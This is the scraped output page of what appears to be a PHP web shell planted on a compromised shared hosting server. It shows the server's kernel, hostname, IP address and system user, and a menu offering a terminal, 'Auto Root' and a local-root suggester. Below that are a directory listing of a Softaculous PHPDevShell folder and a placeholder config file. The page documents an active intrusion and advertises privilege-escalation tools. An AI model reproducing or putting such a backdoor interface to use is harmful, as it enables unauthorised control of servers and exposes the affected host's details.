Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.50
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
phpdevshell /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-07-04 10:37
php53
[ DIR ]
drwxr-xr-x
2017-07-04 10:37
php56
[ DIR ]
drwxr-xr-x
2017-07-04 10:37
edit.php
4.69
KB
-rw-r--r--
2017-01-27 08:13
edit.xml
433
B
-rw-r--r--
2016-04-05 06:03
fileindex.php
115
B
-rw-r--r--
2012-06-07 09:36
import.php
3.84
KB
-rw-r--r--
2017-01-27 08:13
info.xml
1.45
KB
-rw-r--r--
2017-01-27 08:09
install.js
921
B
-rw-r--r--
2013-05-30 02:14
install.php
3.87
KB
-rw-r--r--
2017-01-27 08:13
install.xml
919
B
-rw-r--r--
2011-11-16 02:32
md5
1.08
KB
-rw-r--r--
2017-01-27 08:13
single-site.config.php
1.62
KB
-rw-r--r--
2012-06-07 09:36
Save
Rename
<?php ////////////////////////////////////////////////////////////////////////////////////////// // Mandatory Settings, these settings must be changed for the system to work correctly. // ////////////////////////////////////////////////////////////////////////////////////////// $master = $configuration['master_database']; /** * Database details. * MySQL database name. * @global string */ $configuration[$master]['database'] = '[[softdb]]'; /** * Database details. * MySQL database username. * @global string */ $configuration[$master]['username'] = '[[softdbuser]]'; /** * Database details. * MySQL database password. * @global string */ $configuration[$master]['password'] = '[[softdbpass]]'; // NONE MANDATORY. // You might want to consider changing these setting while you are developing. // IT IS VERY IMPORTANT TO SWITCH THEM TO SAFE SETTING WHEN GOING INTO PRODUCTION. // Use settings from PHPDS-defaults.config.php to extend this file and override defaults. ///////////////////////////////////////////////////////////////////////////////////////// /** * When your system goes to production, set this to TRUE to avoid informations leaks. * Will force compile on template engine. * * Overrides most 'debug' and 'error' settings * * PS: IT WONT SHOW NOTICES OR GENERAL ERRORS IF THIS IS TRUE. * * @var boolean */ $configuration['production'] = false; /** * To what email should critical errors be emailed to, make sure php can send mail, this does not use the PHPDevShell mailing engine. * * @global string */ $configuration['error']['email_critical'] = '[[admin_email]]';